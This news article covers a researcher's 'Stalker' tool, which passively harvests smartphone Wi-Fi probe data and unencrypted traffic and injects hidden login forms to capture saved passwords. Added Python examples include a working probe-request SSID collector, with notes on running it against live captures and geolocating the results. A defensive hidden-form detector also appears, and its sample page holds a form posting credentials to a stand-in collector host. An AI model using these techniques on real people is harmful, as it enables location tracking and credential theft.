As a security professional who gets paid to hack into high-value networks, Mark Wuergler often gets a boost when his targets use smartphones, especially when the device happens to be an iPhone that regularly connects to Wi-Fi networks.

That's because the iPhone is the only smartphone he knows of that transmits, to anyone within radio range, the MAC (media access control) addresses of the last three wireless access points the user has connected to. With off-the-shelf hardware he can passively record those addresses and look them up in databases such as Google Location Services and the Wireless Geographic Logging Engine (WiGLE), which map access-point MAC addresses to coordinates. Because that pinpoints where each of those networks sits, iPhones give him a quick leg up when performing reconnaissance on prospective marks.

"This is interesting on a security level because I'll know where you work, I'll know where you live, and know where you frequent," Wuergler, who is a Senior Security Researcher for Miami-based Immunity Inc., told Ars. "If the last access point you connected to was your home, for example, I'll know right where to go to get to you later or get to your data. If I'm an attacker that wants to break into your company, this becomes a disclosure that an attacker isn't going to pass up."

The exposure of MAC addresses extends not only to iPhones, but to all Apple devices with Wi-Fi capabilities, he said. It means that whenever the wireless features are enabled and not connected to a network—for instance, during a brief encounter at a Starbucks—they broadcast the unique identifiers, and it's trivial for anyone nearby to record them. Wuergler speculates the behavior is a feature designed to automate configuration for networks users regularly access.

Apple did not respond to our requests for comment for this article.

Smartphones of all stripes

While MAC address leakage appears to be unique to Apple products (according to Wuergler), smartphones of all stripes expose so much valuable information that Wuergler has created an application he calls "Stalker" to streamline its collection. Running on a laptop, Stalker vacuums up passwords, images, email and any other data that is sent unencrypted and organizes it in an easy-to-read interface.

Previously accessed network names and unencrypted Facebook chats, emails, and attached documents are all there, along with the name of each smartphone user who exposed them. Stalker presents the collected data in aggregate or allows the user to view the contents retrieved from a specific smartphone owner. Stalker also calls on programming interfaces offered by Google and other location services to automatically plot the recently connected Wi-Fi networks on a map.

In some cases, Wuergler and his colleagues can identify people with ties to a given company just by examining what Stalker has passively collected. When, for example, they encounter a phone that has recently connected to Wi-Fi networks named IBM-Corp and IBM-Conference (hypothetical SSIDs), they know the device has successfully joined those networks at least once before. Like the access-point MAC addresses leaked by iPhones, these names are sent in the clear by smartphones of every type: a phone searching for a network it already knows broadcasts that network's name in its probe requests, so the list of saved networks is exposed whenever the phone is looking for one of them.
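As an added example (this is not Stalker, nor code from Wuergler or Immunity), the following Python parses raw 802.11 probe request frames, pulls out the probing station's MAC address and the SSID it is asking for, and tallies network names per device, which is the passive collection the paragraph describes. The frames, MAC addresses and the HomeNet-5G and CafeX names are constructed test data; IBM-Corp and IBM-Conference are the hypothetical SSIDs from the article. It assumes bare 802.11 headers with no radiotap pseudo-header in front, which a real monitor-mode capture would carry.

```python
"""Added example: parse 802.11 probe requests and tally which network names
each nearby station is asking for. Constructed frames stand in for a capture."""
import struct
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"
FC_PROBE_REQUEST = 0x40   # frame control byte 0: type=0 (mgmt), subtype=4
FC_BEACON = 0x80          # type=0, subtype=8
IE_SSID = 0
IE_SUPPORTED_RATES = 1


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def mac_bytes(mac: str) -> bytes:
    return bytes(int(octet, 16) for octet in mac.split(":"))


def parse_probe_request(frame: bytes):
    """Return {sa, da, bssid, ssid} for a probe request, None for other frames.

    Assumes a bare 802.11 header (no radiotap/prism pseudo-header in front).
    ssid == "" means a wildcard probe, which reveals no network name.
    """
    if len(frame) < 24:
        raise ValueError("truncated 802.11 management header")
    fc0 = frame[0]
    ftype, subtype = (fc0 >> 2) & 0x3, (fc0 >> 4) & 0xF
    if ftype != 0 or subtype != 4:
        return None
    da, sa, bssid = (mac_str(frame[i:i + 6]) for i in (4, 10, 16))
    ssid = None
    offset = 24                      # tagged parameters follow the sequence control field
    while offset + 2 <= len(frame):
        ie_id, ie_len = frame[offset], frame[offset + 1]
        body = frame[offset + 2:offset + 2 + ie_len]
        if len(body) != ie_len:
            raise ValueError("truncated information element")
        if ie_id == IE_SSID:
            ssid = body.decode("utf-8", errors="replace")
        offset += 2 + ie_len
    return {"sa": sa, "da": da, "bssid": bssid, "ssid": ssid}


def collect_probed_ssids(frames):
    """Map each station MAC to the set of named networks it probed for."""
    seen = defaultdict(set)
    for frame in frames:
        probe = parse_probe_request(frame)
        if probe and probe["ssid"]:  # skip non-probes and wildcard probes
            seen[probe["sa"]].add(probe["ssid"])
    return dict(seen)


def build_probe_request(sa: str, ssid: str, seq: int = 0) -> bytes:
    """Constructed test frame: broadcast probe request from `sa` for `ssid`."""
    header = struct.pack("<BBH", FC_PROBE_REQUEST, 0x00, 0)     # fc, duration
    header += mac_bytes(BROADCAST) + mac_bytes(sa) + mac_bytes(BROADCAST)
    header += struct.pack("<H", seq << 4)                       # sequence control
    ssid_raw = ssid.encode("utf-8")
    ies = bytes([IE_SSID, len(ssid_raw)]) + ssid_raw
    ies += bytes([IE_SUPPORTED_RATES, 4, 0x82, 0x84, 0x8B, 0x96])
    return header + ies


def sample_capture():
    """Constructed frames; the MACs are locally administered (0x02) test values."""
    return [
        build_probe_request("02:00:00:00:00:01", "IBM-Corp", 1),
        build_probe_request("02:00:00:00:00:01", "IBM-Conference", 2),
        build_probe_request("02:00:00:00:00:02", "HomeNet-5G", 7),
        build_probe_request("02:00:00:00:00:02", "", 8),     # wildcard probe
        # a beacon from an AP: same header layout, different subtype, skipped
        struct.pack("<BBH", FC_BEACON, 0, 0) + mac_bytes(BROADCAST)
        + mac_bytes("02:00:00:00:00:aa") * 2 + struct.pack("<H", 0)
        + bytes(12) + bytes([IE_SSID, 5]) + b"CafeX",
    ]


if __name__ == "__main__":
    for station, ssids in collect_probed_ssids(sample_capture()).items():
        print(station, "probed for:", ", ".join(sorted(ssids)))
```

Against a live capture, the only additions needed are stripping the radiotap header the driver prepends and feeding the collected SSIDs and BSSIDs to a geolocation lookup such as WiGLE; the parsing above is the part that does the passive collection.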

In other cases, the names of friends and colleagues exposed in email and encounters on Facebook and other sites can give the attackers the personal information they need to trick their mark into revealing even more sensitive information. They have also devised ways to mine any manner of smartphone apps for personal information that is routinely sent in the clear. An app for the Pandora music service, for instance, reveals the birth year, zip code, and sex the user used to register an account.

In theory, smartphone apps can use SSL/TLS to keep sensitive information from being spied on in transit. The problem is that many apps still give users no way to know whether a session is protected, and frequently those protections aren't enabled by default and must be turned on deep in the phone's configuration menu. In the case of the exposed MAC addresses and SSIDs, there is no way to shield that data from prying eyes other than to delete a network's entry from the phone after each use, or to keep Wi-Fi switched off.

Stalker can also steal login credentials from browsers that have saved passwords. It works by injecting hidden forms into the pages a user is loading that mimic the login forms of corporate email systems and other websites, so that the browser's password autofill populates them. Because the fields are invisible, they can be added even while the target is visiting a completely unrelated site, giving little indication that anything is awry.
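To make the pattern concrete from the defender's side, here is an added Python example (not part of Stalker or of the article) that audits the HTML of a fetched page for what the paragraph describes: a form carrying a password field that is itself hidden, sits inside a hidden element, or posts to a host other than the page's own. The page URL, the HTML and the 203.0.113.5 collector address are constructed test data.

```python
"""Added example: flag login forms that are hidden or post off-origin,
the shape an injected credential-harvesting form takes."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

VOID_TAGS = {"input", "img", "br", "hr", "meta", "link", "source"}
HIDDEN_STYLE_MARKERS = ("display:none", "visibility:hidden", "opacity:0")


def _is_hidden(attrs: dict) -> bool:
    """True if the element is hidden via the hidden attribute, type=hidden, or inline CSS."""
    if "hidden" in attrs or (attrs.get("type") or "").lower() == "hidden":
        return True
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return any(marker in style for marker in HIDDEN_STYLE_MARKERS)


class LoginFormAuditor(HTMLParser):
    """Collects every <form>, noting hidden-ness and password inputs.

    Hidden-ness is inherited from enclosing elements via a stack, so a form
    inside a display:none <div> counts as hidden. Badly nested HTML with
    missing end tags can misalign that stack; this is a heuristic, not a DOM.
    """

    def __init__(self, page_url: str):
        super().__init__()
        self.page_url = page_url
        self.page_host = urlsplit(page_url).hostname
        self.forms = []
        self._hidden_stack = []
        self._form = None

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)   # self-closing tag: no end tag follows

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        ancestor_hidden = bool(self._hidden_stack and self._hidden_stack[-1])
        hidden = ancestor_hidden or _is_hidden(a)
        if tag == "form":
            self._form = {
                "action": urljoin(self.page_url, a.get("action") or ""),
                "hidden": hidden,
                "password_fields": 0,
                "hidden_password_fields": 0,
            }
        elif (tag == "input" and self._form is not None
              and (a.get("type") or "text").lower() == "password"):
            self._form["password_fields"] += 1
            if hidden:
                self._form["hidden_password_fields"] += 1
        if tag not in VOID_TAGS:
            self._hidden_stack.append(hidden)

    def handle_endtag(self, tag):
        if tag not in VOID_TAGS and self._hidden_stack:
            self._hidden_stack.pop()
        if tag == "form" and self._form is not None:
            self.forms.append(self._form)
            self._form = None


def audit_login_forms(page_url: str, html: str) -> list:
    """Return [{action, reasons}] for every form with a password field that looks injected."""
    parser = LoginFormAuditor(page_url)
    parser.feed(html)
    parser.close()
    findings = []
    for form in parser.forms:
        if form["password_fields"] == 0:
            continue
        reasons = []
        if form["hidden"]:
            reasons.append("hidden form")
        if form["hidden_password_fields"]:
            reasons.append("hidden password field")
        if urlsplit(form["action"]).hostname != parser.page_host:
            reasons.append("cross-origin action")
        if reasons:
            findings.append({"action": form["action"], "reasons": reasons})
    return findings


# Constructed test page (hypothetical host): a search form, a legitimate
# same-origin login form, and an injected hidden form posting to an
# attacker-controlled collector on the TEST-NET address 203.0.113.5.
PAGE_URL = "https://news.example.test/story/42"
SAMPLE_HTML = """
<html><body>
<form action="/search"><input type="text" name="q"><input type="submit"></form>
<form action="/account/login" method="post">
  <input type="hidden" name="csrf" value="abc">
  <input type="text" name="user"><input type="password" name="pass">
</form>
<div style="display: none">
  <form action="http://203.0.113.5/collect" method="post">
    <input type="text" name="username"><input type="password" name="password">
  </form>
</div>
</body></html>
"""

if __name__ == "__main__":
    for finding in audit_login_forms(PAGE_URL, SAMPLE_HTML):
        print(finding["action"], "->", ", ".join(finding["reasons"]))
```

A cross-origin action on its own is a signal rather than proof, since legitimate single-sign-on pages post credentials to an identity provider's host; the combination with a hidden form or hidden password field is what matches the injected-form pattern.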

Stalker relies on what its author calls a "Man Within Range of You" attack. Unlike a man-in-the-middle attack, in which the hacker sits between the victim and the site and monitors or tampers with data as it passes between them, the app plucks data from radio signals transmitted in the vicinity of the smartphone and uses the same airwaves to inject spoofed traffic back to the targeted device. Because the attacker is not in the traffic path, the injected reply has to win a race: the attack succeeds when the forged data reaches the target before the legitimate response from the real source does, since the device acts on whichever answer arrives first.

Give me convenience or give me security

In many respects, Stalker is a dramatic example of the risks posed by today's smartphone, which was designed with speed and utility as its chief selling points.

"It's widening all of the attack vectors that I can use against you," Wuergler said. "All of the conveniences that are being extended to you are also being extended to an attacker, just making it easier for identity thieves and corporate attackers."

He said the best advice for people concerned about smartphone security is to limit the kinds of personal information they entrust to their devices. Users can also benefit by turning off their device's Wi-Fi as much as possible.

"I do use my phone on wireless networks, but I don't store a lot of personal data on my phone," he said. "If you put your personal data on there, you don't even need to be connected to a wireless network for me to be able to break into your phone."

Update:

(Wuergler said he has tested a variety of phones running the iOS, Android and BlackBerry operating systems but has not provided Ars with a specific list.)

Updated to reflect that IBM-Corp and IBM-Conference were hypothetical SSIDs.